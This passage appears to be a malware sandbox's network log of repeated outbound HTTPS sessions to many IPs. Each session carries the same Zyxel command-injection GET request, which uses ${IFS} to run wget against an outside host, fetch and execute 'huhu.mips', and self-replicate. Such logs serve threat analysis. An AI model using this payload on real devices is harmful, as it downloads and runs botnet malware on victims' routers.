                                                  Jan 19, 2024 18:23:54.011473894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3883192.168.2.1339634155.94.252.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011529922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3884192.168.2.133410879.212.234.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011589050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3885192.168.2.1355894123.239.167.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011637926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3886192.168.2.1352582182.254.253.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011691093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3887192.168.2.134742865.176.117.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011749983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3888192.168.2.135628267.228.140.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011806011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3889192.168.2.133807692.137.110.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011850119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3890192.168.2.1340204165.225.251.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011892080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3891192.168.2.1355194128.50.150.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011945963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3892192.168.2.1358004120.48.212.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012008905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3893192.168.2.1347448182.6.38.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012072086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3894192.168.2.1352470131.86.112.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012131929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3895192.168.2.1340732147.161.49.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012162924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3896192.168.2.134413092.221.183.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012233019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3897192.168.2.135778874.188.227.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012276888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3898192.168.2.133740253.144.243.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012362003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3899192.168.2.133735664.129.40.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012396097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3900192.168.2.1360568164.243.7.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012427092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3901192.168.2.1353002185.193.227.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012460947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3902192.168.2.135621420.0.168.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012526989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3903192.168.2.135421685.13.182.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012559891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3904192.168.2.135402690.63.118.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012615919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3905192.168.2.133835667.23.40.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012669086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3906192.168.2.135426044.96.190.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012703896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3907192.168.2.1336700169.68.30.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012801886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3908192.168.2.133461295.254.204.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012813091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3909192.168.2.1345228171.18.165.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012881994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3910192.168.2.133857634.51.221.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012936115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3911192.168.2.134134839.230.134.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.012993097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3912192.168.2.134234889.40.211.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013037920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3913192.168.2.1356196177.244.216.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013097048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3914192.168.2.1351856123.93.0.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013159990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3915192.168.2.1335812146.68.146.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013211966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3916192.168.2.134308042.12.92.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013254881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3917192.168.2.1333116163.55.39.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013329983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3918192.168.2.1344432117.150.78.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013380051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3919192.168.2.134214252.210.146.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013434887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3920192.168.2.1346502112.207.54.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013504982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3921192.168.2.1346988223.155.26.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013570070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3922192.168.2.133902288.251.148.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013613939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3923192.168.2.13553602.37.42.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013670921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3924192.168.2.13444529.227.239.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013731003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3925192.168.2.133530448.220.130.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013798952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3926192.168.2.133663893.235.104.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013845921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3927192.168.2.1337162150.90.37.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013911963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3928192.168.2.135930646.2.39.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.013959885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3929192.168.2.1357512178.177.167.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014012098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3930192.168.2.135196490.10.237.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014070034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3931192.168.2.1341504203.70.220.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014137030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3932192.168.2.1359668205.6.245.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014203072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3933192.168.2.134319218.219.28.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014238119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3934192.168.2.135458679.195.200.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014302969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3935192.168.2.133995245.93.243.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014360905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3936192.168.2.1356210221.63.26.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014410019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3937192.168.2.1344696132.89.80.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014456034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3938192.168.2.1347932208.204.203.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014514923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3939192.168.2.1353266140.200.131.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014584064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3940192.168.2.134928291.118.228.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014602900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3941192.168.2.133965031.49.78.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014647007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3942192.168.2.1358846156.255.28.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014703989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3943192.168.2.1339800195.229.69.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014744043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3944192.168.2.133747274.165.251.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014862061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3945192.168.2.133506881.182.20.175443
                                                  TimestampBytes transferredDirectionData
